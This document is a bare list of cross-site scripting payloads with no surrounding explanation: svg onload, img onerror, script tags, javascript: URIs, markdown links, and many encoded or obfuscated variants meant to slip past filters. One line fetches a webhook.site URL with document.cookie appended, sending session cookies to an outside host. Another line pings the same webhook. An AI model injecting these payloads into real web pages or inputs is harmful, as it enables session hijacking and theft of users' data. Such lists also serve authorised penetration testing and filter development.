<img src='https://webhook.site/47d9ed20-5b2a-4170-bc64-6d925bc88855' onerror='console.log(5)'>
<img src='x' onerror='fetch("https://webhook.site/47d9ed20-5b2a-4170-bc64-6d925bc88855?ecc="+document.cookie)'>
<SVG ONLOAD=ALERT(1)>
%3Csvg%20onload%3Dalert%281%29%3E
<svg onload=alert(1)>
<svg onload=alert(1)>
\u003csvg onload=alert(1)\u003e
%253Csvg%2520onload%253Dalert%25281%2529%253E
%0A</p><svg onload=alert(1)>
%0D</p><svg onload=alert(1)>
\n</p><svg onload=alert(1)>
</p><script>alert(1)</script>
</p><img src=x onerror=alert(1)>
javascript:alert[String.fromCharCode(40)]1[String.fromCharCode(41)]
javascript:[]['constructor']['constructor']`alert\x281\x29```
%u2039svg+onload%uFF1Dalert%uFF081%uFF09%u203A
%u2039svg onload%uFF1Dalert%uFF081%uFF09%u203A
%u003Csvg onload=alert(1)%26#x3e;
%u003Csvg onload=alert(1)>
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uFF1Csvg onload=alert(3)>
<svg/onload=prompt(1)
[PDFTEST.pdf](https://www.olivex.io)
[PDFTEST.pdf](https://www.olivex.io)
%26#x3c;svg/onload=prompt(1)
〈svg onload=alert(document.cookie)>
〈script〉 alert(1) 〈/script〉
<details onclick=alert(1)>
<div contextmenu=\"xss\">Right-Click Here<menu id=\"xss\" onshow=\"[DATA]\">rtyjyt
<IMG SRC=/ onerror=\"alert(String.fromCharCode(88,83,83))\"></img>
<IMG SRC=\" javascript:alert(\"XSS\");\">
<IMG SRC=\" %26#14; javascript:alert(\"XSS\");\">
<IMG SRC=\"  javascript:alert(\"XSS\");\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"><img src=x onerror=alert(1)>
<IMG STYLE=\"xss: expre\ssion(alert(\"XSS\"))\">
[XSS](javascript:alert('XSS'))
[Test](\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074:alert('XSS'))
[Click](j\u0061v\u0061script:alert('XSS'))
[Link](javascript\u003aalert('XSS'))
%27}}};alert();function%20aaa(){if(1){if(1){a=%27#t=All
[XSS](java script:alert('XSS'))
[Test](java%09script:alert('XSS'))
[Click](java%0ascript:alert('XSS'))
[Link](java%0dscript:alert('XSS'))